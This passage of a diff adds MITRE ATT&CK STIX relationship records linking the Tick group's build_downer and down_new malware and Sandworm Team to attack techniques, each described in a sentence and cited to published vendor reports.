+ "id": "relationship--56465210-d279-4982-a9fa-94a69f5b0b80",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.402Z",
+ "created": "2020-06-10T19:31:48.069Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[build_downer](https://attack.mitre.org/software/S0471) has the ability to use the WinExec API to execute malware on a compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--419b786c-a7db-4357-918c-aa1b883203ee",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.410Z",
+ "created": "2020-06-10T19:31:48.076Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[build_downer](https://attack.mitre.org/software/S0471) has the ability to detect if the infected host is running an anti-virus process.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--79c46f52-743a-4a17-bede-aa003c03f6b1",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.405Z",
+ "created": "2020-06-10T19:31:48.084Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[build_downer](https://attack.mitre.org/software/S0471) has the ability to download files from C2 to the infected host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d870ed48-a7df-4aee-af06-c58ee59432e7",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.399Z",
+ "created": "2020-06-10T19:31:48.115Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[build_downer](https://attack.mitre.org/software/S0471) has the ability to send system volume information to C2.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a6c20b07-57ea-46dd-aa71-93849b6b66ca",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.412Z",
+ "created": "2020-06-10T19:31:48.126Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "iSight Sandworm Oct 2014",
+ "url": "https://web.archive.org/web/20160503234007/https://www.isightpartners.com/2014/10/cve-2014-4114/",
+ "description": "Ward, S.. (2014, October 14). iSIGHT discovers zero-day vulnerability CVE-2014-4114 used in Russian cyber-espionage campaign. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used Base64 encoding within malware variants. [Sandworm Team](https://attack.mitre.org/groups/G0034) has also used ROT13 encoding, AES encryption and compression with the zlib library for their Python-based backdoor.(Citation: iSight Sandworm Oct 2014)(Citation: ESET Telebots Dec 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--c2e9f949-59a5-4e96-b0dd-0bde1a507909",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:40.281Z",
+ "created": "2020-06-10T19:35:58.136Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "iSight Sandworm Oct 2014",
+ "url": "https://web.archive.org/web/20160503234007/https://www.isightpartners.com/2014/10/cve-2014-4114/",
+ "description": "Ward, S.. (2014, October 14). iSIGHT discovers zero-day vulnerability CVE-2014-4114 used in Russian cyber-espionage campaign. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "US-CERT Ukraine Feb 2016",
+ "url": "https://www.us-cert.gov/ics/alerts/IR-ALERT-H-16-056-01",
+ "description": "US-CERT. (2016, February 25). ICS Alert (IR-ALERT-H-16-056-01) Cyber-Attack Against Ukrainian Critical Infrastructure. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has delivered malicious Microsoft Office attachments via spearphishing emails.(Citation: iSight Sandworm Oct 2014)(Citation: US-CERT Ukraine Feb 2016)(Citation: ESET Telebots Dec 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--5259c2ae-964d-49b6-a7e7-6246e748369f",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:40.279Z",
+ "created": "2020-06-10T19:35:58.143Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "external_references": [
+ {
+ "source_name": "iSight Sandworm Oct 2014",
+ "url": "https://web.archive.org/web/20160503234007/https://www.isightpartners.com/2014/10/cve-2014-4114/",
+ "description": "Ward, S.. (2014, October 14). iSIGHT discovers zero-day vulnerability CVE-2014-4114 used in Russian cyber-espionage campaign. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "TrendMicro Sandworm October 2014",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/",
+ "description": "Wu, W. (2014, October 14). An Analysis of Windows Zero-day Vulnerability \u2018CVE-2014-4114\u2019 aka \u201cSandworm\u201d. Retrieved June 18, 2020."
+ },
+ {
+ "source_name": "McAfee Sandworm November 2013",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs-detects-zero-day-exploit-targeting-microsoft-office-2",
+ "description": "Li, H. (2013, November 5). McAfee Labs Detects Zero-Day Exploit Targeting Microsoft Office. Retrieved June 18, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has exploited vulnerabilities in Microsoft PowerPoint via OLE objects (CVE-2014-4114) and Microsoft Word via crafted TIFF images (CVE-2013-3906).(Citation: iSight Sandworm Oct 2014)(Citation: TrendMicro Sandworm October 2014)(Citation: McAfee Sandworm November 2013)",
+ "relationship_type": "uses",
+ "id": "relationship--2311db5c-218f-44f8-aa50-3e8322b79081",
+ "type": "relationship",
+ "modified": "2020-06-18T20:24:20.611Z",
+ "created": "2020-06-10T19:35:58.169Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to detect anti-virus products and processes on a compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--785d0d93-1500-40b5-9f71-9d51aadef914",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.652Z",
+ "created": "2020-06-10T20:19:59.897Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to base64 encode C2 communications.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--215c28bd-3698-4962-b8a9-c632f27c9c82",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.656Z",
+ "created": "2020-06-10T20:19:59.901Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to AES encrypt C2 communications.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f874b527-e973-40f2-89cb-2c7feab5b6b4",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.650Z",
+ "created": "2020-06-10T20:19:59.929Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to identify the system volume information of a compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--14de629c-9b49-4841-901a-85fab61f693b",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.663Z",
+ "created": "2020-06-10T20:19:59.934Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to identify the MAC address of a compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--dd002813-b9b0-435f-8fb1-ee015c401280",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.386Z",
+ "created": "2020-06-10T20:19:59.942Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to use HTTP in C2 communications.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--bea01073-649a-4b27-a9f5-72533faae8cc",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.392Z",
+ "created": "2020-06-10T20:26:53.269Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to gather information on installed applications.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c61ca699-62e8-4c42-b20c-3c042c0fb153",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.390Z",
+ "created": "2020-06-10T20:26:53.317Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to download files to the compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--0efece7a-dc3a-46e1-b56c-7db9e3b61149",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.380Z",
+ "created": "2020-06-10T20:26:53.322Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to list running processes on a compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--56e4717c-33ac-4d7e-a737-71aa520af93e",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.396Z",
+ "created": "2020-06-10T20:26:53.328Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[down_new](https://attack.mitre.org/software/S0472) has the ability to list the directories on a compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--29be6a34-6a89-42e8-a6b1-dca821ed7f94",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.420Z",
+ "created": "2020-06-10T20:26:53.332Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ebab1ba1-e02b-41ab-8682-5a44d68fb155",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.432Z",
+ "created": "2020-06-10T20:30:38.924Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3c3579df-fbd4-4a68-8ee8-e45861a3eda0",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.428Z",
+ "created": "2020-06-10T20:30:38.930Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a8b5c1b4-9ccf-46bc-9074-59e866efcc83",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.417Z",
+ "created": "2020-06-10T20:30:38.936Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034)'s BCS-server tool uses base64 encoding and HTML tags for the communication traffic between the C2 server.(Citation: ESET Telebots Dec 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--185020c6-9b2a-4b08-8936-7d407ea753b4",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:39.932Z",
+ "created": "2020-06-10T21:56:39.932Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034)'s BCS-server tool can create an internal proxy server to redirect traffic from the adversary-controlled C2 to internal servers which may not be connected to the internet, but are interconnected locally.(Citation: ESET Telebots Dec 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--2050b131-d5e1-419c-ad85-660fba4004d7",
+ "type": "relationship",
+ "modified": "2020-06-18T20:24:20.645Z",
+ "created": "2020-06-10T21:56:39.959Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034)'s BCS-server tool connects to the designated C2 server via HTTP.(Citation: ESET Telebots Dec 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f6946801-949a-45e8-b99a-5f58fe119078",
+ "type": "relationship",
+ "modified": "2020-06-10T21:56:39.961Z",
+ "created": "2020-06-10T21:56:39.961Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "ESET Telebots July 2017",
+ "url": "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/",
+ "description": "Cherepanov, A.. (2017, July 4). Analysis of TeleBots\u2019 cunning backdoor . Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used backdoors that can delete files used in an attack from an infected system.(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots July 2017)",
+ "relationship_type": "uses",
